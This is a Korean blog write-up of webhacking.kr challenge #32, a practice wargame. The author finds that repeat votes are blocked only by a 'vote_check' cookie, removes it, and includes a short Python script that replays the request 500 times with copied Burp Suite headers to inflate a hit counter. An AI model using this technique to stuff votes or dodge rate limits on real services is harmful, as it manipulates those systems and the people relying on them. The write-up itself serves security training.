webhacking #32

webhacking #32.

랭킹과 이름 hit 이 쫙 나와있고, 아래로 내려보니 Join 버튼이 있다.

버튼을 클릭하니 Done창이 뜨며 

내 아이디도 추가가 되었다.

이름을 클릭하니 hit 이 1증가 했다.

다시 누르니 no!

뭐로 구분하는 걸까 보니,

vote가 이미 되었다는 쿠키가 존재하는 듯 하다.

이 쿠키를 삭제하고 다시 눌러보니

역시 1이 더 증가했다. 100까지 증가시켜야 하는것 같은데 손으로 하긴 너무 노가다 작업이다;;;

파이썬 코드를 이용해 작업하였다.

import httplib
import urllib
headers = {
    'Host':'webhacking.kr',
    'Proxy-Connection':'keep-alive',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Referer':'http://webhacking.kr/challenge/codeing/code5.html',
    'Accept-Encoding':'gzip,deflate,sdch',
    'Accept-Language':'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
    'Accept-Charset':'windows-949,utf-8;q=0.7,*;q=0.3',
    'Cookie':'st=1415762868; PHPSESSID=prrkdarcpltg8g18r5465a22g4'
}

conn = httplib.HTTPConnection('webhacking.kr')

for i in range(500):
    conn.request('GET', '/challenge/codeing/code5.html?hit=websnot', '', headers)
    response = conn.getresponse()
    rsp = response.read()
    conn.close()

간단히 코드 설명을 하자면 header는 아래와 같이 버프수트에 나오는 그대로 추가하였고, cookie 값에서 vote_check만 없애주었다.

GET 방식으로 request를 여러번 날려주면, 어느순간 새로고침을 했을 때 페이지가 아래와 같이 나온다.

1등이 되어있다. ㅎㅎ

다시 새로 고침을 하면 클리어!